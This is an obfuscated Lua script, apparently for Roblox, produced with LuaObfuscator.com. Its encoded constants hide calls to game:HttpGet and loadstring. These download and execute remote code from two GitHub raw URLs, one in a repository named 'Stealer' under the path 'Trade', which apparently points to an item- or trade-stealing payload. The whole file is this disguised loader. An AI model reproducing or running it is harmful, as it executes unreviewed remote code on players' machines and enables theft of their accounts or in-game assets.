--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v125=0;local v126;while true do if (v125==1) then return v126;end if (v125==0) then v126=v5(v87,v19);v19=nil;v125=1;end end else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((929 -(214 + 713))^(v32-(2 -1))))%((1 + (1271 -(226 + 1044)))^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -1))) ;return v88-(v88%(1638 -(1523 + 114))) ;else local v89=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v89 + v89))>=v89) and (1 -0)) or ((2473 -1905) -(367 + 201)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (119 -(32 + 85)) ;return (v36 * (251 + 5)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 1 + (3 -1) );v18=v18 + (961 -(892 + (415 -(87 + 263)))) ;return (v40 * (16777396 -(67 + 113))) + (v39 * (156337 -90801)) + (v38 * (472 -216)) + v37 ;end local function v24() local v41=0;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(3 + 0)) then if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else v46=953 -(802 + 150) ;v44=0;end elseif (v46==(5511 -3464)) then return ((v45==((0 -0) -0)) and (v47 * (1/(0 + 0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(2020 -((1618 -703) + 82)) ) * (v44 + (v45/(2^(147 -95)))) ;end if (v41==((438 -(145 + 293)) + 0)) then v42=v23();v43=v23();v41=1 -0 ;end if (v41==(1189 -(1069 + 118))) then v46=v20(v43,47 -26 ,31);v47=((v20(v43,32)==(1 -0)) and  -1) or (1 + 0) ;v41=(434 -(44 + 386)) -(1487 -(998 + 488)) ;end if (v41==(1 + 0 + 0)) then v44=1;v45=(v20(v43,792 -(368 + 423) ,(51 + 11) -42 ) * ((20 -(10 + 8))^(122 -90))) + v42 ;v41=444 -(416 + 26) ;end end end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1139 -(116 + 1022)) );v18=v18 + v48 ;local v50={};for v67=773 -(201 + 571) , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 0;end)();local v91=(function() return;end)();local v93=(function() return;end)();while true do if (v90==(0 + 0)) then local v120=(function() return 0 -0 ;end)();while true do if (v120==1) then v90=(function() return  #"[";end)();break;end if ((0 -0)==v120) then v91=(function() return v92();end)();v93=(function() return nil;end)();v120=(function() return 1;end)();end end end if ( #"}"==v90) then if (v91== #">") then v93=(function() return v92()~=(1206 -(696 + 510)) ;end)();elseif (v91==(3 -1)) then v93=(function() return v94();end)();elseif (v91== #"19(") then v93=(function() return v95();end)();end v96[v97]=(function() return v93;end)();break;end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v52=(function() return function(v98,v99,v100,v101,v102,v103,v104,v105,v106) local v107=(function() return 1262 -(1091 + 171) ;end)();local v98=(function() return;end)();local v99=(function() return;end)();while true do if (v107==(0 + 0)) then local v122=(function() return 0;end)();local v123=(function() return;end)();while true do if (v122~=0) then else v123=(function() return 0 -0 ;end)();while true do if (v123==(3 -2)) then v107=(function() return 1;end)();break;end if (v123~=(374 -(123 + 251))) then else v98=(function() return 0 -0 ;end)();v99=(function() return nil;end)();v123=(function() return 1;end)();end end break;end end end if (v107~=(699 -(208 + 490))) then else local v124=(function() return 0 + 0 ;end)();while true do if (v124==(0 + 0)) then local v127=(function() return 836 -(660 + 176) ;end)();while true do if (v127==0) then while true do if (v98~=(0 + 0)) then else v99=(function() return v100();end)();if (v101(v99, #"\\", #",")~=0) then else local v175=(function() return 202 -(14 + 188) ;end)();local v176=(function() return;end)();local v177=(function() return;end)();local v178=(function() return;end)();while true do if (v175~=2) then else if (v101(v177, #"[", #"\\")~= #",") then else v178[2]=(function() return v104[v178[2]];end)();end if (v101(v177,2,677 -(534 + 141) )~= #"|") then else v178[ #"xnx"]=(function() return v104[v178[ #"91("]];end)();end v175=(function() return 3;end)();end if (v175==(2 + 1)) then if (v101(v177, #"asd", #"xxx")== #"~") then v178[ #"0313"]=(function() return v104[v178[ #".dev"]];end)();end v105[v106]=(function() return v178;end)();break;end if (v175~=(1 + 0)) then else local v185=(function() return 0;end)();while true do if (v185~=0) then else v178=(function() return {v102(),v102(),nil,nil};end)();if (v176==(0 + 0)) then local v191=(function() return 0;end)();local v192=(function() return;end)();while true do if (0~=v191) then else v192=(function() return 0 -0 ;end)();while true do if ((0 -0)==v192) then v178[ #"91("]=(function() return v102();end)();v178[ #".dev"]=(function() return v102();end)();break;end end break;end end elseif (v176== #"{") then v178[ #"asd"]=(function() return v103();end)();elseif (v176==(5 -3)) then v178[ #"xxx"]=(function() return v103() -((2 + 0)^16) ;end)();elseif (v176== #"-19") then local v197=(function() return 0 + 0 ;end)();local v198=(function() return;end)();while true do if ((396 -(115 + 281))==v197) then v198=(function() return 0;end)();while true do if (v198==0) then v178[ #"91("]=(function() return v103() -(2^(37 -21)) ;end)();v178[ #".com"]=(function() return v102();end)();break;end end break;end end end v185=(function() return 1;end)();end if (v185~=1) then else v175=(function() return 2 + 0 ;end)();break;end end end if (0==v175) then local v186=(function() return 0;end)();local v187=(function() return;end)();while true do if (v186==0) then v187=(function() return 0;end)();while true do if ((0 -0)==v187) then v176=(function() return v101(v99,2, #"91(");end)();v177=(function() return v101(v99, #"xnxx",21 -15 );end)();v187=(function() return 1;end)();end if (v187~=(868 -(550 + 317))) then else v175=(function() return 1;end)();break;end end break;end end end end end break;end end return v98,v99,v100,v101,v102,v103,v104,v105,v106;end end end end end end end;end)();local v53=(function() return function(v108,v109,v110) local v111=(function() return 0 -0 ;end)();local v112=(function() return;end)();while true do if (v111~=0) then else v112=(function() return 0 -0 ;end)();while true do if (v112~=(0 -0)) then else local v128=(function() return 285 -(134 + 151) ;end)();while true do if (v128~=0) then else v108[v109-#"." ]=(function() return v110();end)();return v108,v109,v110;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"|",v58 do FlatIdent_8199B,Type,v21,Cons,v24,v25,v59,v69=(function() return v51(FlatIdent_8199B,Type,v21,Cons,v24,v25,v59,v69);end)();end v57[ #"asd"]=(function() return v21();end)();for v70= #"[",v23() do FlatIdent_5ED46,Descriptor,v21,v20,v22,v23,v59,v54,v70=(function() return v52(FlatIdent_5ED46,Descriptor,v21,v20,v22,v23,v59,v54,v70);end)();end for v71= #",",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1666 -((1073 -(17 + 86)) + 695) ];local v65=v61[3 -1 ];local v66=v61[1993 -(582 + 1408) ];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=3 -(2 + 0) ;local v77= -(1 -0);local v78={};local v79={...};local v80=v12("#",...) -(1825 -(1195 + 629)) ;local v81={};local v82={};for v113=(0 -0) -0 ,v80 do if (v113>=v74) then v78[v113-v74 ]=v79[v113 + (242 -(187 + 54)) ];else v82[v113]=v79[v113 + 1 ];end end local v83=(v80-v74) + (781 -(162 + 618)) ;local v84;local v85;while true do v84=v72[v76];v85=v84[1];if (v85<=(7 + 2)) then if ((v85<=(3 + 1)) or (3283>=4535)) then if ((18<=2112) and (v85<=(1 -0))) then if (v85>(0 -(0 -0))) then if (v82[v84[2]]==v84[1 + 3 ]) then v76=v76 + (1637 -(1373 + 263)) ;else v76=v84[1003 -(451 + 549) ];end else v82[v84[2]]=v63[v84[1 + 2 ]];end elseif (v85<=((168 -(122 + 44)) -(0 -0))) then v82[v84[2 -0 ]]=v84[1387 -(746 + 638) ];elseif (v85==(2 + 1)) then local v143=v84[2 -0 ];local v144,v145=v75(v82[v143](v13(v82,v143 + (342 -(218 + 123)) ,v84[1584 -(1535 + 46) ])));v77=(v145 + v143) -(1 + (0 -0)) ;local v146=0;for v165=v143,v77 do local v166=0 + 0 + 0 ;while true do if ((1097<=1628) and (v166==(0 + 0))) then v146=v146 + (561 -(306 + 254)) ;v82[v165]=v144[v146];break;end end end else local v147=0 + 0 ;local v148;local v149;local v150;local v151;while true do if (v147==(3 -1)) then for v181=v148,v77 do v151=v151 + 1 ;v82[v181]=v149[v151];end break;end if (v147==(1467 -((1820 -921) + (633 -(30 + 35))))) then v148=v84[2 + 0 ];v149,v150=v75(v82[v148](v13(v82,v148 + ((2 + 0) -1) ,v84[606 -(268 + 335) ])));v147=1;end if ((4630==4630) and ((291 -(60 + 230))==v147)) then v77=(v150 + v148) -(573 -(426 + 146)) ;v151=0;v147=(1258 -(1043 + 214)) + 1 ;end end end elseif ((3540>2683) and (v85<=(1462 -((1065 -783) + 1174)))) then if (v85==(816 -(569 + 242))) then do return;end else for v140=v84[2],v84[(1220 -(323 + 889)) -5 ] do v82[v140]=nil;end end elseif (v85<=(1 + 6)) then if (v82[v84[1026 -(706 + 318) ]]==v84[1255 -(721 + 530) ]) then v76=v76 + (1272 -(945 + 326)) ;else v76=v84[7 -4 ];end elseif (v85==(8 + 0)) then v82[v84[702 -(271 + 429) ]]=v63[v84[3 + 0 ]];else local v155=1500 -(1408 + 92) ;local v156;local v157;while true do if (v155==(1086 -((1240 -779) + 625))) then v156=v84[2];v157=v82[v84[1291 -(993 + (875 -(361 + 219))) ]];v155=1 + 0 ;end if (v155==1) then v82[v156 + (1172 -(418 + 753)) ]=v157;v82[v156]=v157[v84[2 + 2 ]];break;end end end elseif ((4794>=3275) and (v85<=(2 + (332 -(53 + 267))))) then if ((1484==1484) and (v85<=(4 + 7))) then if (v85>(3 + 7)) then v76=v84[532 -(92 + 314 + 123) ];else v82[v84[1771 -(1749 + 20) ]]();end elseif ((1432<3555) and (v85<=12)) then local v134=v84[1 + 1 ];v82[v134]=v82[v134](v13(v82,v134 + 1 ,v77));elseif (v85>(1335 -(1249 + 73))) then for v167=v84[2],v84[2 + 1 ] do v82[v167]=nil;end else v82[v84[1147 -((879 -(15 + 398)) + 679) ]]=v84[6 -3 ];end elseif ((v85<=(45 -29)) or (1065>3578)) then if (v85==15) then local v136=v84[1902 -(106 + 1794) ];v82[v136]=v82[v136](v13(v82,v136 + 1 + 0 ,v77));else v76=v84[1 + 2 ];end elseif ((v85<=((1032 -(18 + 964)) -33)) or (4795<1407)) then v82[v84[5 -3 ]]();elseif (v85==(132 -(4 + 110))) then local v160=v84[586 -(57 + 527) ];local v161=v82[v84[3]];v82[v160 + 1 ]=v161;v82[v160]=v161[v84[1431 -(41 + 1386) ]];else do return;end end v76=v76 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5461646173682D31302F537465616C65722F6D61696E2F5472616465033F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F732D6F2D612D622F6E657875732F6D61696E2F6C6F6164737472696E67001A3O0012023O00014O0006000100013O0026013O0002000100010004103O00020001001202000100013O00260100010005000100010004103O0005000100122O000200023O00122O000300033O002012000300030004001202000500054O0004000300054O000C00023O00022O000A00020001000100122O000200023O00122O000300033O002012000300030004001202000500064O0004000300054O000C00023O00022O000A0002000100010004103O001900010004103O000500010004103O001900010004103O000200012O00053O00017O00",v9(),...);
